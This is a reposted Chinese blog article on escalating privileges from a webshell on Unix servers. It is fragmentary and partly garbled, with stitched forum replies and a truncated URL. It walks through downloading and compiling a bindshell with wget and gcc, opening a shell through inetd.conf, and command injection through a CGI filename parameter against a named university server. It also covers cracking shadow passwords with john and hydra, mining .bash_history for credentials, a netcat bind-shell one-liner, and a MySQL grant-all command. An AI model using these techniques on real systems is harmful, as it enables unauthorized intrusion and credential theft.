我是靠谱客的博主 甜美飞鸟,最近开发中收集的这篇文章主要介绍unix的webshell权限提升方法 ,觉得挺不错的,现在分享给大家,希望可以做个参考。

概述

大部分技巧来源于我家学究天人的eong大大
用wget把bindshell下载到/tmp/目录下
或者再/etc/inetd.conf可写的情况下直接开一个交互的shell
然后用gcc编译
_num=5466654&board=rebarz99&command=down_load&filename=rb9.txt|ls -al" rel=nofollow>http://cgiserver.sogang.ac.kr/~gsvi...ilename=rb9.txt|ls -al|
ls -al显示文件

||中间的是显示的命令
很简单的办法是得到用户

1。我是说用hydra猜测密码,思路混乱的时候打成john跑shadow了。你可能有疑问,有了shell,为什么还要跑普通用户的密码(root经常是不能登陆的)。主要是为了查看.bash_history和其他资料,以及获取一个能够通过ssh/ftp/telnet 登陆的账号。也要考虑到proftpd_0day 之类的是需要一个能够正常登陆的账号的。没有这个webshell我也不会跑了,因为我连用户名(/etc/passwd)都不知道。.bash_history很可能已经包括了你所需要的user/pass.例如mysql的,还包括了管理员通常会访问的其他服务器。当然不是所有机器的访问限制都那么严格。/home对nobody来说也是经常可读的。可是我们必须考虑所有情况。
2。如果你所知道的所有的vul都被补上了,面对所有的suid你都无能为力的时候。也许通过一个可以su -的账号你可以骗出root权限。
3。对于我个人来说,用john跑shadow是为了完善我自己的密码/密码规则库。
4。我从来没有把netcat和pipe 结合一起使用过,没有经验。也请你指教一下。
To blackfox:
搜索suid是有必要的,原因嘛。。不单纯是为了exploit一个suid程序,也反映了管理员的安全意识层次嘛。当然也许这年头还会有suidshell的存在。

exec`nc -l -n -p 60000 -e /bin/sh`
nc下载地址:http://www.leftworld.net/download/show?id=316.html

mysql的ip禁止连接的打开方法:
find / -name my.cnf -print
mysql> grant all on *.* to username@IP identified by 'password';


最后

以上就是甜美飞鸟为你收集整理的unix的webshell权限提升方法 的全部内容,希望文章能够帮你解决unix的webshell权限提升方法 所遇到的程序开发问题。

如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。

本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
点赞(119)

评论列表共有 0 条评论

立即
投稿
返回
顶部